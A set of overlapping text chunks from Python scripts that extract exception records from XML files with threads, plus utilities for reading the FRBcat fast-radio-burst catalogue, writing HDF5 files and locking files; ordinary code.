"ex_dict[exception.exception] = [] ex_dict[exception.exception].append(exception) return ex_dict def debug_print(filename): ex_dict = retrieve_exception_dictionary(filename) ex_dict_keys =",
"as output: with open(path, \"r+\", encoding=\"utf-8\", errors='ignore') as file: lines = \"\\n\".join(file.readlines()) output.write(lines)",
"utils import chunks import threading import glob from pathlib import Path import os",
"threads: t.join() files = glob.glob(\"ignored_data/exceptions/*.txt\") for path in files: with open(f\"ignored_data/exceptions.txt\", \"a\", encoding=\"utf-8\",",
"retrieve_exceptions(lines) def retrieve_exception_dictionary(filename): exceptions = load_exceptions(filename) ex_dict = {} for exception in exceptions:",
"file: lines = \"\\n\".join(file.readlines()) excs = retrieve_exceptions(lines) if len(excs) == 0: continue print(path)",
"+ \"\\n\") def orchestrate_extraction(threads=8): files = glob.glob(\"ignored_data/downloads/*.xml\") files.sort() chunked_files = chunks(files, threads) threads",
"ex_dict def debug_print(filename): ex_dict = retrieve_exception_dictionary(filename) ex_dict_keys = list(ex_dict.keys()) ex_dict_keys.sort() for key in",
"files: with open(f\"ignored_data/exceptions.txt\", \"a\", encoding=\"utf-8\", errors=\"ignore\") as output: with open(path, \"r+\", encoding=\"utf-8\", errors='ignore')",
"def load_exceptions(filename): with open(f\"ignored_data/{filename}\", \"r+\", encoding=\"utf-8\", errors='ignore') as file: lines = \"\\n\".join(file.readlines()) return",
"exceptions: if exception.exception not in ex_dict: ex_dict[exception.exception] = [] ex_dict[exception.exception].append(exception) return ex_dict def",
"in files: fileName = Path(path).stem outputFile = f\"ignored_data/exceptions/{fileName}.txt\" if os.path.isfile(outputFile): continue with open(path,",
"with open(path, \"r+\", encoding=\"utf-8\", errors='ignore') as file: lines = \"\\n\".join(file.readlines()) excs = retrieve_exceptions(lines)",
"in excs: output.write(exception.__str__() + \"\\n\") def orchestrate_extraction(threads=8): files = glob.glob(\"ignored_data/downloads/*.xml\") files.sort() chunked_files =",
"for key in ex_dict_keys: values = ex_dict[key] if len(values) < 2: continue print(key)",
"retrieve_exceptions(lines) if len(excs) == 0: continue print(path) with open(f\"ignored_data/exceptions/{fileName}.txt\", \"a\", encoding=\"utf-8\", errors=\"ignore\") as",
"errors='ignore') as file: lines = \"\\n\".join(file.readlines()) excs = retrieve_exceptions(lines) if len(excs) == 0:",
"from regex_matchers import retrieve_exceptions from utils import chunks import threading import glob from",
"t in threads: t.join() files = glob.glob(\"ignored_data/exceptions/*.txt\") for path in files: with open(f\"ignored_data/exceptions.txt\",",
"ex_dict_keys.sort() for key in ex_dict_keys: values = ex_dict[key] if len(values) < 2: continue",
"retrieve_exceptions from utils import chunks import threading import glob from pathlib import Path",
"path in files: fileName = Path(path).stem outputFile = f\"ignored_data/exceptions/{fileName}.txt\" if os.path.isfile(outputFile): continue with",
"lines = \"\\n\".join(file.readlines()) output.write(lines) def load_exceptions(filename): with open(f\"ignored_data/{filename}\", \"r+\", encoding=\"utf-8\", errors='ignore') as file:",
"threading import glob from pathlib import Path import os def extract_exceptions(files): for path",
"len(excs) == 0: continue print(path) with open(f\"ignored_data/exceptions/{fileName}.txt\", \"a\", encoding=\"utf-8\", errors=\"ignore\") as output: for",
"in threads: t.join() files = glob.glob(\"ignored_data/exceptions/*.txt\") for path in files: with open(f\"ignored_data/exceptions.txt\", \"a\",",
"if exception.exception not in ex_dict: ex_dict[exception.exception] = [] ex_dict[exception.exception].append(exception) return ex_dict def debug_print(filename):",
"encoding=\"utf-8\", errors=\"ignore\") as output: for exception in excs: output.write(exception.__str__() + \"\\n\") def orchestrate_extraction(threads=8):",
"[] for chunk in chunked_files: t = threading.Thread(target=extract_exceptions, args=(chunk,)) threads.append(t) t.start() for t",
"os def extract_exceptions(files): for path in files: fileName = Path(path).stem outputFile = f\"ignored_data/exceptions/{fileName}.txt\"",
"output: with open(path, \"r+\", encoding=\"utf-8\", errors='ignore') as file: lines = \"\\n\".join(file.readlines()) output.write(lines) def",
"errors='ignore') as file: lines = \"\\n\".join(file.readlines()) output.write(lines) def load_exceptions(filename): with open(f\"ignored_data/{filename}\", \"r+\", encoding=\"utf-8\",",
"debug_print(filename): ex_dict = retrieve_exception_dictionary(filename) ex_dict_keys = list(ex_dict.keys()) ex_dict_keys.sort() for key in ex_dict_keys: values",
"in ex_dict: ex_dict[exception.exception] = [] ex_dict[exception.exception].append(exception) return ex_dict def debug_print(filename): ex_dict = retrieve_exception_dictionary(filename)",
"f\"ignored_data/exceptions/{fileName}.txt\" if os.path.isfile(outputFile): continue with open(path, \"r+\", encoding=\"utf-8\", errors='ignore') as file: lines =",
"\"\\n\".join(file.readlines()) return retrieve_exceptions(lines) def retrieve_exception_dictionary(filename): exceptions = load_exceptions(filename) ex_dict = {} for exception",
"threads) threads = [] for chunk in chunked_files: t = threading.Thread(target=extract_exceptions, args=(chunk,)) threads.append(t)",
"pathlib import Path import os def extract_exceptions(files): for path in files: fileName =",
"if len(values) < 2: continue print(key) for value in values: print(f\"\\t{value}\") # debug_print(\"exceptions_minimized.txt\")",
"glob from pathlib import Path import os def extract_exceptions(files): for path in files:",
"\"a\", encoding=\"utf-8\", errors=\"ignore\") as output: for exception in excs: output.write(exception.__str__() + \"\\n\") def",
"from utils import chunks import threading import glob from pathlib import Path import",
"files.sort() chunked_files = chunks(files, threads) threads = [] for chunk in chunked_files: t",
"t.join() files = glob.glob(\"ignored_data/exceptions/*.txt\") for path in files: with open(f\"ignored_data/exceptions.txt\", \"a\", encoding=\"utf-8\", errors=\"ignore\")",
"lines = \"\\n\".join(file.readlines()) return retrieve_exceptions(lines) def retrieve_exception_dictionary(filename): exceptions = load_exceptions(filename) ex_dict = {}",
"excs: output.write(exception.__str__() + \"\\n\") def orchestrate_extraction(threads=8): files = glob.glob(\"ignored_data/downloads/*.xml\") files.sort() chunked_files = chunks(files,",
"open(path, \"r+\", encoding=\"utf-8\", errors='ignore') as file: lines = \"\\n\".join(file.readlines()) excs = retrieve_exceptions(lines) if",
"= load_exceptions(filename) ex_dict = {} for exception in exceptions: if exception.exception not in",
"encoding=\"utf-8\", errors='ignore') as file: lines = \"\\n\".join(file.readlines()) excs = retrieve_exceptions(lines) if len(excs) ==",
"[] ex_dict[exception.exception].append(exception) return ex_dict def debug_print(filename): ex_dict = retrieve_exception_dictionary(filename) ex_dict_keys = list(ex_dict.keys()) ex_dict_keys.sort()",
"output.write(exception.__str__() + \"\\n\") def orchestrate_extraction(threads=8): files = glob.glob(\"ignored_data/downloads/*.xml\") files.sort() chunked_files = chunks(files, threads)",
"if os.path.isfile(outputFile): continue with open(path, \"r+\", encoding=\"utf-8\", errors='ignore') as file: lines = \"\\n\".join(file.readlines())",
"encoding=\"utf-8\", errors='ignore') as file: lines = \"\\n\".join(file.readlines()) output.write(lines) def load_exceptions(filename): with open(f\"ignored_data/{filename}\", \"r+\",",
"= \"\\n\".join(file.readlines()) output.write(lines) def load_exceptions(filename): with open(f\"ignored_data/{filename}\", \"r+\", encoding=\"utf-8\", errors='ignore') as file: lines",
"open(f\"ignored_data/exceptions/{fileName}.txt\", \"a\", encoding=\"utf-8\", errors=\"ignore\") as output: for exception in excs: output.write(exception.__str__() + \"\\n\")",
"not in ex_dict: ex_dict[exception.exception] = [] ex_dict[exception.exception].append(exception) return ex_dict def debug_print(filename): ex_dict =",
"extract_exceptions(files): for path in files: fileName = Path(path).stem outputFile = f\"ignored_data/exceptions/{fileName}.txt\" if os.path.isfile(outputFile):",
"key in ex_dict_keys: values = ex_dict[key] if len(values) < 2: continue print(key) for",
"= glob.glob(\"ignored_data/exceptions/*.txt\") for path in files: with open(f\"ignored_data/exceptions.txt\", \"a\", encoding=\"utf-8\", errors=\"ignore\") as output:",
"import os def extract_exceptions(files): for path in files: fileName = Path(path).stem outputFile =",
"0: continue print(path) with open(f\"ignored_data/exceptions/{fileName}.txt\", \"a\", encoding=\"utf-8\", errors=\"ignore\") as output: for exception in",
"if len(excs) == 0: continue print(path) with open(f\"ignored_data/exceptions/{fileName}.txt\", \"a\", encoding=\"utf-8\", errors=\"ignore\") as output:",
"output.write(lines) def load_exceptions(filename): with open(f\"ignored_data/{filename}\", \"r+\", encoding=\"utf-8\", errors='ignore') as file: lines = \"\\n\".join(file.readlines())",
"exception.exception not in ex_dict: ex_dict[exception.exception] = [] ex_dict[exception.exception].append(exception) return ex_dict def debug_print(filename): ex_dict",
"chunks import threading import glob from pathlib import Path import os def extract_exceptions(files):",
"threading.Thread(target=extract_exceptions, args=(chunk,)) threads.append(t) t.start() for t in threads: t.join() files = glob.glob(\"ignored_data/exceptions/*.txt\") for",
"regex_matchers import retrieve_exceptions from utils import chunks import threading import glob from pathlib",
"import Path import os def extract_exceptions(files): for path in files: fileName = Path(path).stem",
"= list(ex_dict.keys()) ex_dict_keys.sort() for key in ex_dict_keys: values = ex_dict[key] if len(values) <",
"def extract_exceptions(files): for path in files: fileName = Path(path).stem outputFile = f\"ignored_data/exceptions/{fileName}.txt\" if",
"for chunk in chunked_files: t = threading.Thread(target=extract_exceptions, args=(chunk,)) threads.append(t) t.start() for t in",
"= threading.Thread(target=extract_exceptions, args=(chunk,)) threads.append(t) t.start() for t in threads: t.join() files = glob.glob(\"ignored_data/exceptions/*.txt\")",
"file: lines = \"\\n\".join(file.readlines()) output.write(lines) def load_exceptions(filename): with open(f\"ignored_data/{filename}\", \"r+\", encoding=\"utf-8\", errors='ignore') as",
"return retrieve_exceptions(lines) def retrieve_exception_dictionary(filename): exceptions = load_exceptions(filename) ex_dict = {} for exception in",
"\"\\n\".join(file.readlines()) excs = retrieve_exceptions(lines) if len(excs) == 0: continue print(path) with open(f\"ignored_data/exceptions/{fileName}.txt\", \"a\",",
"for exception in exceptions: if exception.exception not in ex_dict: ex_dict[exception.exception] = [] ex_dict[exception.exception].append(exception)",
"for path in files: with open(f\"ignored_data/exceptions.txt\", \"a\", encoding=\"utf-8\", errors=\"ignore\") as output: with open(path,",
"ex_dict[exception.exception].append(exception) return ex_dict def debug_print(filename): ex_dict = retrieve_exception_dictionary(filename) ex_dict_keys = list(ex_dict.keys()) ex_dict_keys.sort() for",
"open(path, \"r+\", encoding=\"utf-8\", errors='ignore') as file: lines = \"\\n\".join(file.readlines()) output.write(lines) def load_exceptions(filename): with",
"files = glob.glob(\"ignored_data/exceptions/*.txt\") for path in files: with open(f\"ignored_data/exceptions.txt\", \"a\", encoding=\"utf-8\", errors=\"ignore\") as",
"files = glob.glob(\"ignored_data/downloads/*.xml\") files.sort() chunked_files = chunks(files, threads) threads = [] for chunk",
"errors=\"ignore\") as output: with open(path, \"r+\", encoding=\"utf-8\", errors='ignore') as file: lines = \"\\n\".join(file.readlines())",
"= [] ex_dict[exception.exception].append(exception) return ex_dict def debug_print(filename): ex_dict = retrieve_exception_dictionary(filename) ex_dict_keys = list(ex_dict.keys())",
"os.path.isfile(outputFile): continue with open(path, \"r+\", encoding=\"utf-8\", errors='ignore') as file: lines = \"\\n\".join(file.readlines()) excs",
"= Path(path).stem outputFile = f\"ignored_data/exceptions/{fileName}.txt\" if os.path.isfile(outputFile): continue with open(path, \"r+\", encoding=\"utf-8\", errors='ignore')",
"Path import os def extract_exceptions(files): for path in files: fileName = Path(path).stem outputFile",
"for path in files: fileName = Path(path).stem outputFile = f\"ignored_data/exceptions/{fileName}.txt\" if os.path.isfile(outputFile): continue",
"threads.append(t) t.start() for t in threads: t.join() files = glob.glob(\"ignored_data/exceptions/*.txt\") for path in",
"def debug_print(filename): ex_dict = retrieve_exception_dictionary(filename) ex_dict_keys = list(ex_dict.keys()) ex_dict_keys.sort() for key in ex_dict_keys:",
"from pathlib import Path import os def extract_exceptions(files): for path in files: fileName",
"files: fileName = Path(path).stem outputFile = f\"ignored_data/exceptions/{fileName}.txt\" if os.path.isfile(outputFile): continue with open(path, \"r+\",",
"def retrieve_exception_dictionary(filename): exceptions = load_exceptions(filename) ex_dict = {} for exception in exceptions: if",
"chunk in chunked_files: t = threading.Thread(target=extract_exceptions, args=(chunk,)) threads.append(t) t.start() for t in threads:",
"import retrieve_exceptions from utils import chunks import threading import glob from pathlib import",
"Path(path).stem outputFile = f\"ignored_data/exceptions/{fileName}.txt\" if os.path.isfile(outputFile): continue with open(path, \"r+\", encoding=\"utf-8\", errors='ignore') as",
"\"\\n\".join(file.readlines()) output.write(lines) def load_exceptions(filename): with open(f\"ignored_data/{filename}\", \"r+\", encoding=\"utf-8\", errors='ignore') as file: lines =",
"chunked_files: t = threading.Thread(target=extract_exceptions, args=(chunk,)) threads.append(t) t.start() for t in threads: t.join() files",
"output: for exception in excs: output.write(exception.__str__() + \"\\n\") def orchestrate_extraction(threads=8): files = glob.glob(\"ignored_data/downloads/*.xml\")",
"in chunked_files: t = threading.Thread(target=extract_exceptions, args=(chunk,)) threads.append(t) t.start() for t in threads: t.join()",
"outputFile = f\"ignored_data/exceptions/{fileName}.txt\" if os.path.isfile(outputFile): continue with open(path, \"r+\", encoding=\"utf-8\", errors='ignore') as file:",
"with open(f\"ignored_data/exceptions.txt\", \"a\", encoding=\"utf-8\", errors=\"ignore\") as output: with open(path, \"r+\", encoding=\"utf-8\", errors='ignore') as",
"ex_dict_keys: values = ex_dict[key] if len(values) < 2: continue print(key) for value in",
"= \"\\n\".join(file.readlines()) return retrieve_exceptions(lines) def retrieve_exception_dictionary(filename): exceptions = load_exceptions(filename) ex_dict = {} for",
"ex_dict: ex_dict[exception.exception] = [] ex_dict[exception.exception].append(exception) return ex_dict def debug_print(filename): ex_dict = retrieve_exception_dictionary(filename) ex_dict_keys",
"in exceptions: if exception.exception not in ex_dict: ex_dict[exception.exception] = [] ex_dict[exception.exception].append(exception) return ex_dict",
"ex_dict_keys = list(ex_dict.keys()) ex_dict_keys.sort() for key in ex_dict_keys: values = ex_dict[key] if len(values)",
"\"r+\", encoding=\"utf-8\", errors='ignore') as file: lines = \"\\n\".join(file.readlines()) output.write(lines) def load_exceptions(filename): with open(f\"ignored_data/{filename}\",",
"exception in excs: output.write(exception.__str__() + \"\\n\") def orchestrate_extraction(threads=8): files = glob.glob(\"ignored_data/downloads/*.xml\") files.sort() chunked_files",
"load_exceptions(filename) ex_dict = {} for exception in exceptions: if exception.exception not in ex_dict:",
"= \"\\n\".join(file.readlines()) excs = retrieve_exceptions(lines) if len(excs) == 0: continue print(path) with open(f\"ignored_data/exceptions/{fileName}.txt\",",
"open(f\"ignored_data/{filename}\", \"r+\", encoding=\"utf-8\", errors='ignore') as file: lines = \"\\n\".join(file.readlines()) return retrieve_exceptions(lines) def retrieve_exception_dictionary(filename):",
"print(path) with open(f\"ignored_data/exceptions/{fileName}.txt\", \"a\", encoding=\"utf-8\", errors=\"ignore\") as output: for exception in excs: output.write(exception.__str__()",
"\"r+\", encoding=\"utf-8\", errors='ignore') as file: lines = \"\\n\".join(file.readlines()) return retrieve_exceptions(lines) def retrieve_exception_dictionary(filename): exceptions",
"fileName = Path(path).stem outputFile = f\"ignored_data/exceptions/{fileName}.txt\" if os.path.isfile(outputFile): continue with open(path, \"r+\", encoding=\"utf-8\",",
"t.start() for t in threads: t.join() files = glob.glob(\"ignored_data/exceptions/*.txt\") for path in files:",
"open(f\"ignored_data/exceptions.txt\", \"a\", encoding=\"utf-8\", errors=\"ignore\") as output: with open(path, \"r+\", encoding=\"utf-8\", errors='ignore') as file:",
"def orchestrate_extraction(threads=8): files = glob.glob(\"ignored_data/downloads/*.xml\") files.sort() chunked_files = chunks(files, threads) threads = []",
"retrieve_exception_dictionary(filename) ex_dict_keys = list(ex_dict.keys()) ex_dict_keys.sort() for key in ex_dict_keys: values = ex_dict[key] if",
"= {} for exception in exceptions: if exception.exception not in ex_dict: ex_dict[exception.exception] =",
"chunks(files, threads) threads = [] for chunk in chunked_files: t = threading.Thread(target=extract_exceptions, args=(chunk,))",
"= retrieve_exceptions(lines) if len(excs) == 0: continue print(path) with open(f\"ignored_data/exceptions/{fileName}.txt\", \"a\", encoding=\"utf-8\", errors=\"ignore\")",
"exception in exceptions: if exception.exception not in ex_dict: ex_dict[exception.exception] = [] ex_dict[exception.exception].append(exception) return",
"import glob from pathlib import Path import os def extract_exceptions(files): for path in",
"in files: with open(f\"ignored_data/exceptions.txt\", \"a\", encoding=\"utf-8\", errors=\"ignore\") as output: with open(path, \"r+\", encoding=\"utf-8\",",
"\"r+\", encoding=\"utf-8\", errors='ignore') as file: lines = \"\\n\".join(file.readlines()) excs = retrieve_exceptions(lines) if len(excs)",
"return ex_dict def debug_print(filename): ex_dict = retrieve_exception_dictionary(filename) ex_dict_keys = list(ex_dict.keys()) ex_dict_keys.sort() for key",
"orchestrate_extraction(threads=8): files = glob.glob(\"ignored_data/downloads/*.xml\") files.sort() chunked_files = chunks(files, threads) threads = [] for",
"as file: lines = \"\\n\".join(file.readlines()) output.write(lines) def load_exceptions(filename): with open(f\"ignored_data/{filename}\", \"r+\", encoding=\"utf-8\", errors='ignore')",
"import threading import glob from pathlib import Path import os def extract_exceptions(files): for",
"with open(f\"ignored_data/exceptions/{fileName}.txt\", \"a\", encoding=\"utf-8\", errors=\"ignore\") as output: for exception in excs: output.write(exception.__str__() +",
"excs = retrieve_exceptions(lines) if len(excs) == 0: continue print(path) with open(f\"ignored_data/exceptions/{fileName}.txt\", \"a\", encoding=\"utf-8\",",
"args=(chunk,)) threads.append(t) t.start() for t in threads: t.join() files = glob.glob(\"ignored_data/exceptions/*.txt\") for path",
"exceptions = load_exceptions(filename) ex_dict = {} for exception in exceptions: if exception.exception not",
"t = threading.Thread(target=extract_exceptions, args=(chunk,)) threads.append(t) t.start() for t in threads: t.join() files =",
"values = ex_dict[key] if len(values) < 2: continue print(key) for value in values:",
"path in files: with open(f\"ignored_data/exceptions.txt\", \"a\", encoding=\"utf-8\", errors=\"ignore\") as output: with open(path, \"r+\",",
"\"\\n\") def orchestrate_extraction(threads=8): files = glob.glob(\"ignored_data/downloads/*.xml\") files.sort() chunked_files = chunks(files, threads) threads =",
"ex_dict = retrieve_exception_dictionary(filename) ex_dict_keys = list(ex_dict.keys()) ex_dict_keys.sort() for key in ex_dict_keys: values =",
"continue with open(path, \"r+\", encoding=\"utf-8\", errors='ignore') as file: lines = \"\\n\".join(file.readlines()) excs =",
"in ex_dict_keys: values = ex_dict[key] if len(values) < 2: continue print(key) for value",
"lines = \"\\n\".join(file.readlines()) excs = retrieve_exceptions(lines) if len(excs) == 0: continue print(path) with",
"encoding=\"utf-8\", errors='ignore') as file: lines = \"\\n\".join(file.readlines()) return retrieve_exceptions(lines) def retrieve_exception_dictionary(filename): exceptions =",
"continue print(path) with open(f\"ignored_data/exceptions/{fileName}.txt\", \"a\", encoding=\"utf-8\", errors=\"ignore\") as output: for exception in excs:",
"errors='ignore') as file: lines = \"\\n\".join(file.readlines()) return retrieve_exceptions(lines) def retrieve_exception_dictionary(filename): exceptions = load_exceptions(filename)"
] |
[
"corrupt nodes in your h5 file. in that case, visit: ### https://stackoverflow.com/questions/47979751/recover-data-from-corrupted-file/61147632?noredirect=1#comment108190378_61147632 tries",
"== 'telescope' )[0][0] i_s = [i_ID, i_DM, i_DM_gal, i_RM, i_tau, i_zs, i_tele] ##",
"row[i_tau] == 'null' ) : continue if RM and ( row[i_RM] == 'null'",
"import sleep ## wrapper to write hdf5 files consistently def Write2h5( filename='', datas=[],",
"not in [telescopes_FRBcat[tele] for tele in telescopes] ) : continue if tau and",
"exceeded\" ) raise # TODO It would be nice to avoid an arbitrary",
"Returns -1 if no item satysfing the condition is found. >>> first( (1,2,3),",
"-1 THANKS TO Caridorc https://stackoverflow.com/questions/2361426/get-the-first-item-from-an-iterable-that-matches-a-condition \"\"\" try: return next(x for x in iterable",
"continue FRBs.append( tuple( [ decode(row[i].split('&')[0], dtype) for i, dtype in zip( i_s, np.array(FRB_dtype)[:,1]",
"i_zs = np.where( header == 'rmp_redshift_host' )[0][0] i_tele = np.where( header == 'telescope'",
"*args, **kwargs ): \"\"\" measure time taken to compute function \"\"\" def MeasureTime():",
"in that case, visit: ### https://stackoverflow.com/questions/47979751/recover-data-from-corrupted-file/61147632?noredirect=1#comment108190378_61147632 tries = 0 while tries < 30:",
"f.__delitem__( key ) except: pass f.create_dataset( key, data=data ) break #except: sleep(3e-2) tries",
"True, only return FRBs observed with temproal broadening print_number : boolean if True,",
"header == 'telescope' )[0][0] i_s = [i_ID, i_DM, i_DM_gal, i_RM, i_tau, i_zs, i_tele]",
"== 'null' ) : continue if RM and ( row[i_RM] == 'null' )",
"func, *args, **kwargs ): \"\"\" measure time taken to compute function \"\"\" def",
"## provided by derpston, https://github.com/derpston/python-simpleflock/blob/master/src/simpleflock.py#L14 import os, fcntl, errno class SimpleFlock: \"\"\"Provides the",
"> 9) -1 THANKS TO Caridorc https://stackoverflow.com/questions/2361426/get-the-first-item-from-an-iterable-that-matches-a-condition \"\"\" try: return next(x for x",
"next(x for x in iterable if condition(x)) except: return -1 ## wrapper to",
"to same file simultaneously ## provided by derpston, https://github.com/derpston/python-simpleflock/blob/master/src/simpleflock.py#L14 import os, fcntl, errno",
"hard because it is # unnecessary. This is mostly to help the user",
"as h5, numpy as np, yt, csv from time import time, sleep from",
": continue FRBs.append( tuple( [ decode(row[i].split('&')[0], dtype) for i, dtype in zip( i_s,",
"i, dtype in zip( i_s, np.array(FRB_dtype)[:,1] ) ] ) ) return np.array( FRBs,",
"and time() > (start_lock_search + self._timeout): # Exceeded the user-specified timeout. print( \"timeout",
"here, but spinning # without a delay is also undesirable. sleep(0.1) def __exit__(self,",
"with open( frbcat_file, 'r') as f: reader = csv.reader( f ) header =",
"print( \"couldn't write \", keys ) sys.exit(1) ## Read FRBcat #FRB_dtype = [('ID','S'),('DM','f'),('DM_gal','f'),",
"unavailable raise elif self._timeout is not None and time() > (start_lock_search + self._timeout):",
"try: os.unlink(self._path) except: pass ''' USAGE with SimpleFlock(\"locktest\", 2): ## \"locktest\" is a",
"left ## if file is locked, code is paused until lock is released,",
"in telescopes] ) : continue if tau and ( row[i_tau] == 'null' )",
"self._fd = None def __enter__(self): self._fd = os.open(self._path, os.O_CREAT) start_lock_search = time() while",
"- t0 print( \"Running %s took %i minutes and %.1f seconds %s\" %",
"use with the `with` syntax. It will create/truncate/delete the lock file as necessary.\"\"\"",
"the locked file(s) ## file is locked when with starts until its left",
"sys, h5py as h5, numpy as np, yt, csv from time import time,",
"## \"locktest\" is a temporary file that tells whether the lock is active",
"[ decode(row[i].split('&')[0], dtype) for i, dtype in zip( i_s, np.array(FRB_dtype)[:,1] ) ] )",
"try: fcntl.flock(self._fd, fcntl.LOCK_EX | fcntl.LOCK_NB) # Lock acquired! return except (OSError, IOError) as",
"array structured numpy.array containing values listed in FRBcat \"\"\" ### read all FRBs",
"item of the iterable. Returns -1 if no item satysfing the condition is",
"### print_number:True print number of extracted FRBs FRBs = [] with open( frbcat_file,",
"case, visit: ### https://stackoverflow.com/questions/47979751/recover-data-from-corrupted-file/61147632?noredirect=1#comment108190378_61147632 tries = 0 while tries < 30: #try: with",
"numpy.array containing values listed in FRBcat \"\"\" ### read all FRBs from FRBcat",
"import sys, h5py as h5, numpy as np, yt, csv from time import",
"from writing to same file simultaneously ## provided by derpston, https://github.com/derpston/python-simpleflock/blob/master/src/simpleflock.py#L14 import os,",
"lambda x: True): \"\"\" Returns the first item in the `iterable` that satisfies",
"if RM and ( row[i_RM] == 'null' ) : continue FRBs.append( tuple( [",
"paused until lock is released, then with is performed ''' def first(iterable, condition",
"i_DM_gal = np.where( header == 'rop_mw_dm_limit' )[0][0] i_RM = np.where( header == 'rmp_rm'",
"PreFRBLE.parameter import * from time import time def TimeElapsed( func, *args, **kwargs ):",
"### optional: read only those FRBs observed by telescope with RM and tau",
"sys.exit( 'Write2h5 needs list of datas and keys' ) ### small workaround to",
"0 i_DM = np.where( header == 'rmp_dm' )[0][0] i_DM_gal = np.where( header ==",
"= np.where( header == 'rmp_scattering' )[0][0] i_zs = np.where( header == 'rmp_redshift_host' )[0][0]",
"os, fcntl, errno class SimpleFlock: \"\"\"Provides the simplest possible interface to flock-based file",
"if 'null' in string: return float('NaN') return float(string) return string def GetFRBsMeasures( measure='DM',",
"print number of extracted FRBs FRBs = [] with open( frbcat_file, 'r') as",
"filename. overwrite existing entries \"\"\" if type(keys) is str: sys.exit( 'Write2h5 needs list",
"\"{} took {} s\".format( func.__name__, time()-t0 ) ) return res return MeasureTime() from",
"raise # TODO It would be nice to avoid an arbitrary sleep here,",
"if condition(x)) except: return -1 ## wrapper to show time needed for some",
"time() - t0 print( \"Running %s took %i minutes and %.1f seconds %s\"",
"caution, might corrupt nodes in your h5 file. in that case, visit: ###",
"would be nice to avoid an arbitrary sleep here, but spinning # without",
"i_RM, i_tau, i_zs, i_tele] ## order must fit order of FRB_dtype for row",
"= timeout self._fd = None def __enter__(self): self._fd = os.open(self._path, os.O_CREAT) start_lock_search =",
"x: x % 2 == 0) 2 >>> first(range(3, 100)) 3 >>> first(",
") t = time() - t0 print( \"Running %s took %i minutes and",
"keys=[] ): \"\"\" conveniently write datas to keys in filename. overwrite existing entries",
"i_ID = 0 i_DM = np.where( header == 'rmp_dm' )[0][0] i_DM_gal = np.where(",
"list of considered telescopes, FRBs of other telescopes are ignored RM : boolean",
"i_DM_gal, i_RM, i_tau, i_zs, i_tele] ## order must fit order of FRB_dtype for",
"# Lock acquired! return except (OSError, IOError) as ex: if ex.errno != errno.EAGAIN:",
"to allow for parallel computation. Use with caution, might corrupt nodes in your",
"FRB_dtype = [('ID','U9'),('DM','f'),('DM_gal','f'), ('RM','f'),('tau','f'),('host_redshift','f'), ('tele','U10')] def GetFRBcat( telescopes=None, RM=None, tau=None, print_number=False ): \"\"\"",
"observed with temproal broadening print_number : boolean if True, print number of extractet",
"https://stackoverflow.com/questions/2361426/get-the-first-item-from-an-iterable-that-matches-a-condition \"\"\" try: return next(x for x in iterable if condition(x)) except: return",
"return FRBs['DM']-FRBs['DM_gal'] elif measure == 'RM': return FRBs['RM'] ## flocker to keep parallel",
">>> first( (1,2,3), condition=lambda x: x % 2 == 0) 2 >>> first(range(3,",
"THANKS TO Caridorc https://stackoverflow.com/questions/2361426/get-the-first-item-from-an-iterable-that-matches-a-condition \"\"\" try: return next(x for x in iterable if",
"is active ## perform action on the locked file(s) ## file is locked",
"pass ''' USAGE with SimpleFlock(\"locktest\", 2): ## \"locktest\" is a temporary file that",
"time needed for some function ''' def HowLong( f, *args, print_additional='', **kwargs ):",
"file locking. Intended for use with the `with` syntax. It will create/truncate/delete the",
"\"\"\" t0 = time() ret = f( *args, **kwargs ) t = time()",
"'rmp_dm' )[0][0] i_DM_gal = np.where( header == 'rop_mw_dm_limit' )[0][0] i_RM = np.where( header",
"2 == 0) 2 >>> first(range(3, 100)) 3 >>> first( (1,2,3), condition=lambda x:",
"Read FRBcat #FRB_dtype = [('ID','S'),('DM','f'),('DM_gal','f'), ('RM','f'),('tau','f'),('host_redshift','S'), ('tele','S')] #FRB_dtype = [('ID','U9'),('DM','f'),('DM_gal','f'), ('RM','U10'),('tau','U10'),('host_redshift','U4'), ('tele','U10')] FRB_dtype",
"i_tau, i_zs, i_tele] ## order must fit order of FRB_dtype for row in",
"## if file is locked, code is paused until lock is released, then",
") return np.array( FRBs, dtype=FRB_dtype ) def decode( string, dtype='U' ): \"\"\" short",
"file is locked when with starts until its left ## if file is",
"Try to remove the lock file, but don't try too hard because it",
"__init__(self, path, timeout = None): self._path = path self._timeout = timeout self._fd =",
"= np.array(next(reader)) # header = np.array(reader.next()) i_ID = 0 i_DM = np.where( header",
"Parameters ---------- telescopes : list list of considered telescopes, FRBs of other telescopes",
"the user-specified timeout. print( \"timeout exceeded\" ) raise # TODO It would be",
"filesystem. try: os.unlink(self._path) except: pass ''' USAGE with SimpleFlock(\"locktest\", 2): ## \"locktest\" is",
"action on the locked file(s) ## file is locked when with starts until",
"\"\"\" short wrapper to decode byte-strings read from FRBcat \"\"\" if 'f' in",
"measure == 'RM': return FRBs['RM'] ## flocker to keep parallel processes from writing",
"* from time import time def TimeElapsed( func, *args, **kwargs ): \"\"\" measure",
"i_tau = np.where( header == 'rmp_scattering' )[0][0] i_zs = np.where( header == 'rmp_redshift_host'",
"'null' ) : continue FRBs.append( tuple( [ decode(row[i].split('&')[0], dtype) for i, dtype in",
"data=data ) break #except: sleep(3e-2) tries += 1 pass else: print( \"couldn't write",
"flocker to keep parallel processes from writing to same file simultaneously ## provided",
"+ self._timeout): # Exceeded the user-specified timeout. print( \"timeout exceeded\" ) raise #",
"Exceeded the user-specified timeout. print( \"timeout exceeded\" ) raise # TODO It would",
"return MeasureTime() from time import sleep ## wrapper to write hdf5 files consistently",
"time() while True: try: fcntl.flock(self._fd, fcntl.LOCK_EX | fcntl.LOCK_NB) # Lock acquired! return except",
"i_DM = np.where( header == 'rmp_dm' )[0][0] i_DM_gal = np.where( header == 'rop_mw_dm_limit'",
"in dtype: if 'null' in string: return float('NaN') return float(string) return string def",
"## Read FRBcat #FRB_dtype = [('ID','S'),('DM','f'),('DM_gal','f'), ('RM','f'),('tau','f'),('host_redshift','S'), ('tele','S')] #FRB_dtype = [('ID','U9'),('DM','f'),('DM_gal','f'), ('RM','U10'),('tau','U10'),('host_redshift','U4'), ('tele','U10')]",
"values listed in FRBcat \"\"\" ### read all FRBs from FRBcat ### optional:",
") : continue FRBs.append( tuple( [ decode(row[i].split('&')[0], dtype) for i, dtype in zip(",
"It will create/truncate/delete the lock file as necessary.\"\"\" def __init__(self, path, timeout =",
"string def GetFRBsMeasures( measure='DM', FRBs=None ): \"\"\" returns measures of FRBs in FRBcat",
"is not given, returns the first item of the iterable. Returns -1 if",
"open( frbcat_file, 'r') as f: reader = csv.reader( f ) header = np.array(next(reader))",
